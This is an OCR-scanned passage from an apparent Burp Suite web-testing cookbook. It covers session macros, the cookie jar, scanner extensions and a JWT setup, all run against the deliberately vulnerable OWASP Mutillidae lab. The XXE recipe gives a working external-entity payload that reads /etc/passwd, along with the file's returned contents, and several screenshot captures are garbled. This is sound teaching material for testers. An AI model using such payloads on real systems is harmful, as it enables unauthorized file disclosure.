cs a fs iaa [Type a search term 0 matches | Testmacro | 


11. Click the Configure item button to validate that the username and password 
values are correct. Click OK when done, as follows: 


B configure Macro Item: POST request to http://192.168,56.101/mutillidae/index.php?page=login.php X 
(2) Configure Macro Item 
Configure how cookies and request parameters are handled for this macro tem. 


Cookie handling 
W) Add cookies received in responses to the session handling cookie jar 
W) Use cookies from the session handling cookie jar in requests 


Parameter handling 


Custom parameter locations in response 


Name Value derived from 


P/E E 


12. Click OK to close the Macro Editor. You should see the newly-created 
macro in the Session handling action editor. Click OK to close this dialog 
window, as follows: 


Bsession handling action editor - LoglnSessionRule 


This action runs a predefined macro (sequence of requests) and optionally updates parameters and cookies in the current request based on the result of 


the macro. 


Select macro: 


(u | [gece 
og 


Note that the request currently being processed by this session handling rule wil stil be issued, so the macro should not include this request unless itis 
necessary to issue it twice. 


(Œ) Update current request with parameters matched from final macro response 
@ Update all parameters except for: 


(Es) 
© Update only the following parameters: 


C Tolerate URL mismatch when matching parameters (use for URL-agnostic CRSF tokens) 


(Œ) Update current request with cookies from session handling cookie jar 


@ Update all cookies except for: 
icy 
C) Update only the following cookies: 


ic 


Lo} [cama 


13. After closing the Session handling action editor, you are returned to the 
Session handling rule editor where you now see the Rule Actions section 
populated with the name of your macro. Click the Scope tab of this window 
to define which tool will use this rule: 


WB) Session handling | 


| Details [ score | 


[2] Rule Description 


LoginSessionRule 


[2] Rule Actions 


The actions below will be performed in sequence when this rule is applied to a request. 


Enabled | Description 


@ run macro: LoginMacro 


| OK | | Cancel | 


14. On the Scope tab of the Session handling rule editor, uncheck the other 


boxes, leaving only the Repeater checked. Under URL Scope, click the 
Include all URLs radio button. Click OK to close this editor, as follows: 


E Session handling rule editor X 
Details S co e | 


(2?) Tools Scope 


Select the tools that this rule will be applied to. 


O Target O Scanner Repeater 


O) Spider (J Intruder _) Sequencer 
(U) Extender C) Proxy (use with caution) 


(2) URL Scope 


Use the configuration below to control which URLs this rule applies to. 


© Include all URLs 


O Use suite scope [defined in Target tab] 
© Use custom scope 


(2) Parameter Scope 
You can restrict the rule to requests containing specific parameters if required. 
J) Restrict to requests containing these parameters: 


Edit 


| OK | | Cancel | 


15. You should now see the new session-handling rule listed in the Session 
Handling Rules window, as follows: 


Sequencer | Decoder | Comparer Project options | User options | Alens | 


(2) Session Handling Rules 


© You can define session handling rules to make Burp perform specific actions when making HTTP requests. Each rule has a defined scope (for particular took 
in to the application, or checking session validity. Before each request is issued, Burp applies in sequence each of the rules that are in-scope for the request 


Add Enabled | Description | Tools | 
Use cookies from Burp’s cookie jar Spider and Scanner 
Edit 


To monitor or troubleshoot the behavior of your session handling rules, you can use the sessions tracer to view in detail the results of processing each rule. 


Open sessions tracer 


16. Return to the Repeater tab where you, previously, were not logged in to the 
application. Click the Go button to reveal that you are now logged in as Ed! 
This means your session-handling rule and associated macro worked: 


Target | Proxy | Spider | Scanner | intruder Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 
1 
| eo. | n <" > Target: http://192.168.56.101 | 
Request Response 
[Rew | Params | Headers | Hex Raw | Headers | Hex | HTML J Render | 
GET ry 
/wut illidae/index. php?page=home. phpépopUpNot i ficationCode=HPHO ae 
mt © OWASP Mutillidae II: Web Pwn in M 
E en Thi utillidae II: We nin Mass 
User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:€1.0) . 
Gecko/20100101 Firefox/é1.0 Production 
Accept 
text /htal, application/xhtal+xml,application/xml;q=0.9,*/*;q=0.9 z p = 7 
M en-US, pa Version: 2.6.24 Security Level; 5 (Server-side Security) Hints: Disabled (0 - I try harder) | Logged In User: ed || 
Accept-Encoding: gzip, deflate (Commandline KungFu anyone?) 
B 
http://192. 168. S6. 101 /mutillidae/index. php?page=add-to-your-blog 


ie: shovhints=0; PHPSESSID=vvvérh7ueelvqraér thgéSiph3; 
2 e 


3 : 
ersist=nada; username=ed; uid=24 


OWASP 2013 Mutillidae: Deliberately 
owasp 2010 Vulnerable Web Pen-Testing 
OWASP 2007 Application 


Upgrade-Insecure-Requests: 1 


How it works... 


In this recipe, we saw how an unauthenticated session can be changed to an 
authenticated one by replaying the login process. The creation of macros allows 
manual steps to be scripted and assigned to various tools within the Burp suite. 


Burp allows testers to configure session-handling rules to address various 
conditions that the suite of tools may encounter. The rules provide additional 
actions to be taken when those conditions are met. In this recipe, we addressed 
an unauthenticated session by creating a new session-handling rule, which called 
a macro. We confined the scope for this rule to Repeater only for demonstration 
purposes. 


Getting caught in the cookie jar 


While targeting an application, Burp captures all of the cookies it encounters 
while proxying and spidering HTTP traffic against a target site. Burp stores these 
cookies in a cache called the cookie jar. This cookie jar is used within the 
default session-handling rule and can be shared among the suite of Burp tools, 
such as Proxy, Intruder, and Spider. Inside the cookie jar, there is a historical 
table of requests. The table details each cookie domain and path. It is possible to 
edit or remove cookies from the cookie jar. 


Getting ready 


We will open the Burp Cookie Jar and look inside. Then, using the OWASP 
GetBoo application, we'll identify new cookies added to the Burp Cookie Jar. 


How to do it... 


1. Shut down and restart Burp so it is clean of any history. Switch to the Burp 
Project options tab, then the Sessions tab. In the Cookie Jar section, click 
the Open cookie jar button, as follows: 


[2] Session Handling Rules 


p You can define session handling rules to make Burp perform specific actions when making HTTP requests. Each rule has a defined scope (for particular t 
in to the application, or checking session validity. Before each request is issued, Burp applies in sequence each of the rules that are in-scope for the requ 


Add Enabled | Description Tools 
Œ Use cookies from Burp's cookie jar Spider and Scanner 


To monitor or troubleshoot the behavior of your session handling rules, you can use the sessions tracer to view in detail the results of processing each ru 


p Burp maintains a cookie jar that stores all of the cookies issued by visited web sites. Session handling rules can use and update these cookies to maintain 
control how Burp automatically updates the cookie jar based on traffic from particular tools. 


Monitor the following tools’ traffic to update the cookie jar: 


@ Proxy C Scanner (C Repeater Œ Spider 
C intruder ~() Sequencer () Extender 


Open cookie jar 


2. Anew pop-up box appears. Since we have no proxied traffic yet, the cookie 


jar is empty. Let's target an application and get some cookies captured, as 
follows: 


E Cookie jar viewer == O x 


| Path | Name | Value Expires | | Edit cookie 
| Remove cookie | 
| Empty cookie jar | 

[cose | 


3. From the OWASP Landing page, click the link to access the GetBoo 
application, as follows: 


OLD (VULNERABLE) VERSIONS OF REAL APPLICATIONS 


© WordPress @orangeHRM 
©@GTD-PHP 

@yazd Owebc alendar 

@ Gallery2 @ Tiki Wiki 

@ Joomla © Awstats 


4. Click the Login button. At the login screen, type both the username and 
password as demo, and then click the Log In button. 


5. Return to the Burp Cookie Jar. You now have three cookies available. Each 
cookie has a Domain, Path, Name, and Value identified, as follows: 


Cookie jar viewer =“  s 
Doman (Pah (Name (Vale Expres | | Edt cookie 
192.168.56.1... PHPSESSID §=—-vwv6rh/ueelvarmérfbg6Siph3 
192.168.58.1... acopendivids  swingset,jotto, phpbb2 redmine Remove cookie 
192.168.58.1... acgroupswit.. nada 
Empty cookie jar 


6. Select the last cookie in the list and click the Edit cookie button. Modify the 
value from nada to thisIsMyCookie and then click OK, as follows: 


E Cookie editor Xx 


Domain: 192.168.56.101 


Path: 


Name: acgroupswithpersist 


Value: [thisisttyCookie | 


pama 


7. The value is now changed, as follows: 


B cookie jar viewer = 4 


>< 


Domain (Path (Name | Value | Expires 
192.168.56.1... PHPSESSID == vwv6rh7ueelvarmérfbg6Siph3 
192.168.58.1... acopendivids  swingset jotto ohpbb2 redmine 


8. The default scope for the Burp Cookie Jar is Proxy and Spider. However, 


you may expand the scope to include other tools. Click the checkbox for 
Repeater, as follows: 


B Cookie Jar 


5 Burp maintains a cookie jar that stores all of the cookies issued by visited web sites. Session 
control how Burp automatically updates the cookie jar based on traffic from particular tools. 


Monitor the following tools’ traffic to update the cookie jar: 


Proxy (J Scanner Œ Spider 


(J Intruder (U Sequencer ) Extender 
: — | 


Now, if you create a new session-handling rule and use the default Burp Cookie 
Jar, you will see the new value for that cookie used in the requests. 


How it works... 


The Burp Cookie Jar is used by session-handling rules for cookie-handling when 
automating requests against a target application. In this recipe, we looked into 
the Cookie Jar, understood its contents, and even modified one of the values of a 
captured cookie. Any subsequent session-handling rules that use the default 
Burp Cookie Jar will see the modified value in the request. 


Adding great pentester plugins 


As web-application testers, you will find handy tools to add to your repertoire to 
make your assessments more efficient. The Burp community offers many 
wonderful extensions. In this recipe, we will add a couple of them and explain 
how they can make your assessments better. Retire.js and Software Vulnerability 
Scanner are the two plugins, these two plugins are used with the passive scanner. 


Note: Both of these plugins require the Burp Professional version. 


Getting ready 


Using the OWASP Mutilliae II application, we will add two handy extensions 
that will help us find more vulnerabilities in our target. 


How to do it... 


1. Switch to the Burp Extender tab. Go to the BApp Store and find two 
plugins—Retire.js and Software Vulnerability Scanner. Click the 
Install button for each plugin, as follows: 


BApp Sore 


The Bop Store contains Burp extents tal have been writen by users of Burp Sute, to extend Burp's capa, 


ne nly Pty ald Ce E 

mieit. Aath H a hie 

epee er mm m im Th enters grates Burp wi fe Rele regesary to fnd vulnerati JavaSript vars, 

Regia Wait A sea {pss ols at aver fies aded and identies tose whch are vera besed on various signature 

Rapor To ae Search Mond -A yA Faaa Ynes URL, fan ie contani or apacia ast), 

Reve ig hii) +— suas 

Reelin Ait) — Sm hte Pied 

Fee aie iat H Nd i 
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ese ie biti +— em Ste (tan 
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Reve De be) + aa — 
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Sofware Vueratily Scaner ony — Drees 


2. After installing the two plugins, go to the Extender tab, then Extensions, 
and then the Burp Extensions section. Make sure both plugins are enabled 
with check marks inside the check boxes. Also, notice the Software 
Vulnerability Scanner has a new tab, as follows: 


at [rey [soe [same [va [ea | sme [moar [tor ne S| 
(cin | s200 sor [oe [oie 


Burp Extensions 


Extensions let you customize Burp's behavior using your own or third-party code. 


Add | Loaded | Type | Name 


W = Java Retire js 


Cre ‘or 
iW nea „cå -f 


3. Return to the Firefox browser and browse to the Mutillidae homepage. 
Perform a lightweight, less-invasive passive scan by right-clicking and 
selecting Passively scan this branch, as follows: 


Fa [ote [ axe [ne [eae [sc [oe [cme [ee 


Logging of out- 


Y [© http//192.168.56.101 Contents 
-| œ mutili =] 
[i http://192,168.56,104/mutillidae ' 


Remove from scope 


b =- javas 


4. Note the additional findings created from the two plugins. The Vulners 
plugin, which is the Software Vulnerability Scanner, found numerous CVE 
issues, and Retire. js identified five instances of a vulnerable version of 
jQuery, as follows: 


Passively scan this branch 


File path traversal [2] 
XPath injection 


o | 


© mutilidae/javascript'ddsmoothmenu/jquery.min js 
“i /mutilidaejavascript'ddsmoothmenu/jquery.min. js 
eo /mutillidae/javascriptjQuery/jquery js 
ay /mutillidae/javascriptjQuery/jquery js 
ai /mutillidae/javascriptjQuery/jquery js 

© Password field with autocomplete enabled 

! Client-side HTTP parameter pollution (reflected) [2] 

1 Input returned in response (reflected) [9] 

i Cross-domain Referer leakage [3] 


b 
b 
b 


! [Vulners] Vulnerable Software detected 


Issue: [Wulners] Vulnerable Software detected 
Severity: High 

Confidence: Firm 

Host: http://192.168.56.104 

Path: imutillidae/ 


Note: This issue was generated by a Burp extension. 


Issue detail 
The following vulnerabilities for software OpenSSL, headers - 0.9.8k found: 


© OPENSSL: CVE-2014-0224 - 6.8 - Vulnerability in OpenSSL 
(CVE-2014-0224) 
An attacker can force the use of weak keying material in 
OpenSSL SSL/TLS clients and servers. This can be exploited by a 
Man-in-the-middle (MITM) attack where the attacker can decrypt 
and modify traffic from the attacked client and server. Reported 
by KIKU... 


How it works... 


Burp functionality can be extended through a PortSwigger API to create custom 
extensions, also known as plugins. In this recipe, we installed two plugins that 
assist with identifying older versions of software contained in the application 
with known vulnerabilities. 


Creating new issues via the Manual- 
Scan Issues Extension 


Though Burp provides a listing of many security vulnerabilities commonly 
found in web applications, occasionally you will identify an issue and need to 
create a custom scan finding. This can be done using the Manual-Scan 

Issues Extension. 


Note: This plugin requires the Burp Professional edition. 


Getting ready 


Using the OWASP Mutillidae II application, we will add the Manual Scan Issues 
Extension, create steps revealing a finding, then use the extension to create a 
custom issue. 


How to do it... 


1. Switch to the Burp Extender tab. Go to the BApp Store and find the plugin 
labeled Manual Scan Issues. Click the Install button: 


BApp Store 


The BApp Store contains Burp extensions that have been written by users of Burp Suite, to extend Burp’s capabilities. 


Name | Installed | Rating | Popularity | Lastupdated | Detail 
eautitier 

JSON Decoder swank —] 24 Jan 2017 

JSON Web Token Attacker wey ——t— 22Nov2017 

JSON Web Tokens wea ——t— 03May2018 

JSWS Parser trara —- 15 Feb 2017 

JVM Property Editor RRR 4 24 Jan 2017 

Kerberos Authentication warnai —- 30 Aug 2017 

Lair weeny A 25 Jan 2017 Pro extension 
Lenath Extension Attacks nervy —- 25 Jan 2017 

LightBulb WAF Auditing Frame... wenn M 22 Jan 2018 


Logger++ www ———- 21May2018 


2. Return to the Firefox browser and browse to the Mutillidae homepage. 

3. Switch to the Burp Proxy | HTTP history tab and find the request you just 
made browsing to the homepage. Click the Response tab. Note the overly 
verbose Server header indicating the web server type and version along 
with the operating system and programming language used. This 
information can be used by an attacker to fingerprint the technology stack 
and identify vulnerabilities that can be exploited: 


Respon 
| Raw Headers | Hex | HTML | Render 


HITP/1.1 200 OK 
Date: Thu, 13 Sep 2018 15:55:03 GMT 


Phusion_Passenger/4.0.30 mod _perl/-.0.4 
Expires: Mon, 26 Jul 1997 05:00:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-cache="set-cookie” 
Pragma: no-cache 

Logged-In-User: 

X-FRAME-OPTIONS: DENY 

Last-Modified: Thu, 13 Sep 2018 15:55:03 GMT 

Vary: Accept-Encoding 

Content-Length: 45734 

Connection: close 

Content-Type: text/html 


erl/vS.10.1 


4. Since this is a finding, we need to create a new issue manually to capture it 
for our report. While viewing the Request, right-click and select Add Issue, 
as follows: 


Pans Ed Sata Legh 


CET /autillidae/indes, php’page=home, phpdpoplpMotdficationCodesHPH) HITP/1. 
Host: 192.168. 86.101 

ser-Agent: Mooilla/$.0 (Windows NT 10.0; Wind; x64; rv:61.0) Gecko/20L0010) Pirefox/6l.0 
Accept: text/html, application/xhtwltyul, applicatLoplmloulft/fsge) OQ 


Accept=Language: enti enjge0.4 Sant Spiler 

Aecept-Incoding: grip, deflate he 

Referer: http: //192.l68. 46. 10L/mutillidae/ index. phy oka Lontode=L00] 

Cookie: showhints=0; PHPSESSID=mrvéthTueelvqrmér thy 208 passe sca jotto, phpbb’, reduine; acgroupswithpersistenada 
Connection, close Send to hiruder Chr 


Upgrade=Insecure-Requests: 1 


Send to Repeater CHR 
Send to Sequencer 

Send to Compare 

Send to Decoder 

Show response browser 

Request in browser 


5. A pop-up dialog box appears. Within the General tab, we can create a new 
issue name of Information Leakage in Server Response. Obviously, 
you may add more verbiage around the issue detail, background, and 
remediation areas, as follows: 


{| ManScanAdd X 


| General. HTTP Request | HTTP Response 


Information Leakage in Server Response 


Issue Detail: 


Enter Issue Detail... 


Issue Background: 


Enter Issue Background... 


Remediation Background: 


Enter Remediation Background... 


Remediation Detail: 


Enter Remediation Detail... 


URL (path = http:!domain/path): 


http://192.168.56.101:30/mutilidae/ndex.php?page=hħhome.php&popUpNotificationCode=HPHO 


6. If we flip to the HTTP Request tab, we can copy and paste into the text area 
the contents of the Request tab found within the message editor, as follows: 


HTTP Request: 


GET /mutillidae/index. php ?page=home. php&popUpNotificationCode=HPHO HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64: x64: rv:61.0) Gecko/20100101 Firefow61.0 
Accept: text/html application/xhtml+xml application/xml:q=0.9,*/*;q=0.8 

Accept-Language: en-US,en:q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http://192.168.56.101/mutillidae/index. php ?page=login.php&popUpNotificationCode=LOU1 
Cookie: showhints=0; PHPSESSID=vyv6rh7ueelvarmérfbg6Siph3; acopendivids=swingset jotto phpbb2,redmine; acgroupswithpersi 
st=nada 

Connection: close 

Upgrade-Insecure-Requests: 1 


7. If we flip to the HTTP Response tab, we can copy and paste into the text 
area the contents of the Response tab found within the message editor. 

8. Once completed, flip back to the General tab and click the Import Finding 
button. You should see the newly-created scan issue added to the Issues 
window, as follows: 


Issues 


Cleartext submission of password 


@ information Leakage in Server Response 
„Advisory | Reauest | Response | 


T Information Leakage in Server Response 


Issue: Information Leakage in Server Response 
Severity: High 

Confidence: Certain 

Host: http://192.166.56.101 

Path: /imutillidae/index.php 


Note: This issue was generated by a Burp extension. 


Issue detail 


Enter Issue Detail... 


Remediation detail 


Enter Remediation Detail... 


Issue background 
Enter Issue Background... 
Remediation background 


Enter Remediation Background... 


How it works... 


In cases where an issue is not available within the Burp core issue list, a tester 
can create their own issue using the Manual-Scan Issue Extension. In this recipe, 
we created an issue for Information Leakage in Server Responses. 


See also 


For a listing of all issue definitions identified by Burp, go 
to https://portswigger.net/kb/issues. 


Working with the Active Scan++ 
Extension 


Some extensions assist in finding vulnerabilities with specific payloads, such as 
XML, or help to find hidden issues, such as cache poisoning and DNS rebinding. 
In this recipe, we will add an active scanner extension called Active Scan++, 
which assists with identifying these more specialized vulnerabilities. 


Note: This plugin requires the Burp Professional edition. 


Getting ready 


Using the OWASP Mutillidae II application, we will add the Active Scant++ 
extension, and then run an active scan against the target. 


How to do it... 


1. Switch to the Burp Extender | BApp Store and select the Active Scan++ 
extension. Click the Install button to install the extension, as follows: 


at [ow | sir [ emer [cr | eter See [ut | cmp [xn [Po 
Í Extensions | BApp Store [AAs | options | 


BApp Store 


The BApp Store contains Burp extensions that have been written by users of Burp Suite, to extend Burp's capabilities. 


| nstaled | Rating | Popularity | Lastupdated | Detail 


NET Beautifier ARRE ———-- 23Jan2017 


2. Return to the Firefox browser and browse to the Mutillidae homepage. 


3. Switch to the Burp Target tab, then the Site map tab, right-click on the 
mutillidae folder, and select Actively scan this branch, as follows: 


Content 


Dò http://192.168.56.101/mutillidae 


Remove from scope 


L framer.html - - 
"i ee images Spider this branch 
> Dò includes Actively scan this branch 


4. When the Active scanning wizard appears, you may leave the default 
settings and click the Next button, as follows: 


Nid ia a aA AAA = y 
Eii scanning wizard UX 


a| You have selected 204 items for active scanning. Before continuing, you can use the fiters below to remove certain categories of 
tems, to make your Scanning more targeted and efficient. 


(4) Remove duplicate tems (same URL and parameters) [112 tems] 

(| Remove tems already scanned (same URL and parameters) [156 tems] 
Remove out-of-scope tems (0 tems] 

| Remove tems with no parameters (67 tems} 

Ø Remove tems with media responses [4+ tems] 


LJ Remove tems with the following extensions [45 tems] 


js gif jpo,png css 


Note: Some of the selected tems do not yet have responses. If you choose to remove tems with media responses, some of these 


tems may be removed from the scan when their responses have been analyzed. 
CAIL 


Follow the prompts and click OK to begin the scanning process. 


5. After the active scanner completes, browse to the Issues window. Make 
note of any additional issues found by the newly-added extension. You can 
always tell which ones the extension found by looking for the This issue 
was generated by the Burp extension: Active Scan++ message, as follows: 


T Arbitrary host header accepted | Compare responses | 


Issue: Arbitrary host header accepted 
Severity: Low 

Confidence: Certain 

Host: http://192.168.56.101 

Path: imutillidae/index.php 


Note: This issue was generated by the Burp extension: Active Scan++. 


Issue detail 


The application appears to be accessible using arbitrary HTTP Host headers. 


This is a serious issue if the application is not externally accessible or uses IP-based 
access restrictions. Attackers can use DNS Rebinding to bypass any IP or firewall 
based access restrictions that may be in place, by proxying through their target's 
browser. 

Note that modern web browsers’ use of DNS pinning does not effectively prevent this 
attack. The only effective mitigation is server-side: 
https://bugzilla.mozilla.org/show_bug.cgi7id=6893354c13 


Additionally, it may be possible to directly bypass poorly implemented access 
restrictions by sending a Host header of ‘localhost 


How it works... 


Burp functionality can be extended beyond core findings with the use of 
extensions. In this recipe, we installed a plugin that extends the Active Scanner 
functionality to assist with identifying additional issues such as Arbitrary Header 
Injection, as seen in this recipe. 


Implementing Advanced Topic 
Attacks 


In this chapter, we will cover the following recipes: 


Performing XML External Entity (X XE) attacks 

Working with JSON Web Token (JWT) 

Using Burp Collaborator to determine Server-Side Request Forgery 
(SSRF) 

Testing Cross-Origin Resource Sharing (CORS) 

Performing Java deserialization attacks 


Introduction 


This chapter covers intermediate to advanced topics such as working with JWT, 
XXE, and Java deserialization attacks, and how to use Burp to assist with such 
assessments. With some advanced attacks, Burp plugins provide tremendous 
help in easing the task required by the tester. 


Software tool requirements 


In order to complete the recipes in this chapter, you will need the following: 


e OWASP Broken Web Applications (BWA) 
e OWASP Mutillidae link 
e Burp Proxy Community or Professional (https://portswigger.net/burp/) 


Performing XXE attacks 


XXE is a vulnerability that targets applications parsing XML. Attackers can 
manipulate the XML input with arbitrary commands and send those commands 
as external entity references within the XML structure. The XML is then 
executed by a weakly-configured parser, giving the attacker the requested 
resource. 


Getting ready 


Using the OWASP Mutillidae II XML validator page, determine whether the 
application is susceptible to XXE attacks. 


How to do it... 


1. Navigate to the XML External Entity Injection page, that is, through Others 
| XML External Entity Injection | XML Validator: 


e90 M () 192.168.356.101 /mutilidae/ndexphp?page=xmi-validator.php w q 


o% OWASP Mutilidae I Web Pun in Mass Prod 


Version: 2624 Security Level 0 (Hosed) Hints: Enabled (4 «Script Ke) Not 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL ResetDB View 
omasa = 
XML Validator 
wasp 2010 = 
Back Qen 


owasp 2007 = 
i Hints 
HTML 5 _ 


Others CSUN COM Please Enter XML to Validate 


Cross-Frame Framing (Third-party } 
Framing) 


Documentation <somexml><message>Hello Worlds/message>s/some 


Resources Unrestricted Flle Upload 


XML External Entity Injection P XML Validator 


2. While on the XML Validator page, perform the example XML that is 
provided on the page. Click on the Validate XML button: 


XML Validator 
Back Q Help Me! 


Hints 


Please Enter XML to Validate 


Example: <somexml><message>Hello World</message></somexml> 


XML 


XML Submitted 


<somexml><message>Hello World</message></somexml> 


Text Content Parsed From XML 
Hello World 


3. Switch to Burp Proxy| HTTP history tab and look for the request you just 
submitted to validate the XML. Right-click and send the request to the 


repeater: 


Target Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts | JSON Beautifier | JSON Web Tokens | Java 


[ intercept | HTTP history | WebSockets history | Options 


| Filter: Hiding CSS, image and general binary content 


# | Host | Method | URL 


[rest Leeson | 
(pa [wore recer Trec] 


GET /mutillidae/index.php?page=xml-validator.phpáxml=$09$3Csomexml$3E$3Cmessaget3EHellotWorld$i3C$2Fmessaget3E$3C$2Fsomexml$3E+4áxml-validator-php- 
HTTP/1.1 

Host: 192.168.656.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/6l.0 
Accept: text/html ,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: 

htty: //192.168-56.101/mutillidae/index-phn?pvaqge=xml-validator . phnéxml=%3C%3F¥xmltversions 3D$271- 


Send to Spider 
Do an active scan 
Do a passive scan 
Send to intruder 


4. Note the value provided in the xml parameter: 


Go Cancel <i >i" 


GET 


/mutillidae/index.php?page=xul-validator. phpéxml=$09% 3Csomexml$ 3% 3Cmessage’3EHello 
‘tor 1d 3C$ 2Fmessage$ 3E$ 30% 2Fsomexml$ 3E+é xul-validator-php-submit-button=ValidatetHl 


L HITP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 
Firefox/él.0 

Accept: text/html, application/xhtultxml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-U5,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: 

http: //192.168.56.101/mutillidae/index.php?page=xml-validator.phpéxml=$3C43¥xultvers 
Lon$3D$271_ 08274 3FS SRS OD$ 088098 30 SLDOCTYPE+change-logt$ SBsODs OAs 09$09% 308 SLENTITY+ 
systemEntityt5YSTEMt$22..$2F. $27. $2F. $2 Fetct 2 Fpasswdt 224 SES ODS 0A$ 098 SDs SES ODS OAS 
O5% 3Cchange-Logt 3ESODs OAs 058098 3Chexts IES losystemEntitys SBS SCs lFrexts IES OD$ OAS 098 3C 
$2Fchange-Llogt 3Eaxml-validator-php-submit-button=ValidatetMML 

Cookie: showhints=1; PHPSESS1D=deudZotk7ivg2tihtlped49irol; 
acopendivids=swingset,jotto,phpbh2,redmine; acgroupswithpersist=nada 

Connection: close 

Upgrade-Insecure-Requests: 1 


5. Use Burp Proxy Interceptor to replace this XML parameter value with the 
following payload. This new payload will make a request to a file on the 
operating system that should be restricted from view, namely, the 
/etc/passwd file: 


<?xml version="1.0"?> 
<!DOCTYPE change-log[ 
<!ENTITY systemEntity SYSTEM 
"..7../../.,./etc/passwd"> 
|> 
<change-log> 
<text>&systemEntity;</text> 
</change-log> 


Since there are odd characters and spaces in the new XML message, let's 
type this payload into the Decoder section and URL-encode it before we 
paste it into the xml parameter. 


6. Switch to the Decoder section, type or paste the new payload into the text 
area. Click the Encode as... button and select the URL option from the 
drop-down listing. Then, copy the URL-encoded payload using Ctrl + C. 
Make sure you copy all of the payload by scrolling to the right: 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder 


<?xml version="1.0"°?> 
<IDOCTYPE change-log [ 
<JENTITY systemEntity SYSTEM "../.././_/etc/passwd"> 
> 
<change-log> 
<text-&systementity;<Mtext> 
</change-log> 


ene Of 7 896d [60020 769085 96 72073069 596 Mabe todd 229031 2e 3022S 
al 


7. Switch to the Burp Proxy Intercept tab. Turn the interceptor on with 


the Intercept is on button. 

8. Return to the Firefox browser and reload the page. As the request is paused, 
replace the current value of the xml parameter with the new URL-encoded 
payload: 


Target Jiro l Spider T Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts | JSON Beautifier | JSON Web Totens | Java Serial Kier } 


| Request to htipw192 166 56.101:80 


Forward Drop intercept is on Adon 83) (2 
Raw | Params | Headers | Hex | 
GET 
7 dae7inder agerral 


CEILLE 


ests: 1 


9. Click the Forward button. Turn interceptor off by toggling the button to 
Intercept is off. 
10. Note that the returned XML now shows the contents of the /etc/passwd 
file! The XML parser granted us access to the /etc/passwd file on the 
operating system: 


Y Hints | 


Please Enter XML to Validate 


Example: <somexml><message>Hello World</message></somexml> 


XML 


-XML Submitted- 


<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../.. 
/etc/passwd"> ]> <change-log> <text>&systemEntity;</text> </change-log> 


Text Content Parsed From XML 


root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:9:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh |p:x:7:7:Ip:/var/spool/|pd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/varilist:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/varilib/gnats: 
[bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh 
syslog:x:101:102::/nome/syslog:/bin/false klog:x:102:103::/nhome/klog:/bin/false 
mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false landscape:x:104:122::/var/lib/landscape: 
/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin postgres:x:106:109:PostgreSQL 
administrator, ,:/var/lib/postgresql:/bin/bash messagebus:x:107:114::/var/run/dbus:/bin/false 
tomcat6:x:108:115::/usr/share/tomcat6:/bin/false user:x:1000:1000:user, ,:/home/user:/bin/bash 
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false haldaemon:x:110:119:Hardware abstraction 
layer,,,:/var/run/hald:/bin/false pulse:x:111:120:PulseAudio daemon,,,:/var/run/pulse:/bin/false 
postfix:x:112:123::/var/spool/postfix:/bin/false 


How it works... 


In this recipe, the insecure XML parser receives the request within the XML for 
the /etc/passwd file residing on the server. Since there is no validation 
performed on the XML request due to a weakly-configured parser, the resource 
is freely provided to the attacker. 


Working with JWT 


As more sites provide client API access, JWT are commonly used for 
authentication. These tokens hold identity and claims information tied to the 
resources the user is granted access to on the target site. Web-penetration testers 
need to read these tokens and determine their strength. Fortunately, there are 
some handy plugins that make working with JWT tokens inside of Burp much 
easier. We will learn about these plugins in this recipe. 


Getting ready 


In this recipe, we need to generate JWT tokens. Therefore, we will use the 
OneLogin software to assist with this task. In order to complete this recipe, 
browse to the OneLogin website: https://www.onelogin.com/. Click the 
Developers link at the top and then click the GET A DEVELOPER ACCOUNT 


link (https://www.onelogin.com/developer-signup). 


After you sign up, you will be asked to verify your account and create a 
password. Please perform these account setup tasks prior to starting this recipe. 


Using the OneLogin SSO account, we will use two Burp extensions to examine 
the JWT tokens assigned as authentication by the site. 


How to do it... 


1. Switch to Burp BApp Store and install two plugins—JSON Beautifier and 
JSON Web Tokens: 


Sapp Sior | | opten 


BApp Store 


The BApp Store contains Burp extensions that have been written by users of Burp Suite, to extend Burp's capabilities. 


| Name Installed | Rating | Popularity | Last updated 


| Java Serial Killer were —I 30 Jan 2017 
| Java Serialized Payloads weedy ——4 06 Feb 2017 
i 

| JCryption Handler 14 Jul 2017 


| Detail | 


JSON Decoder ARA =] 24 Jan 2017 


2. In the Firefox browser, go to your OneLogin page. The URL will be 
specific to the developer account you created. Log in to the account using 
the credentials you established when you set up the account before 
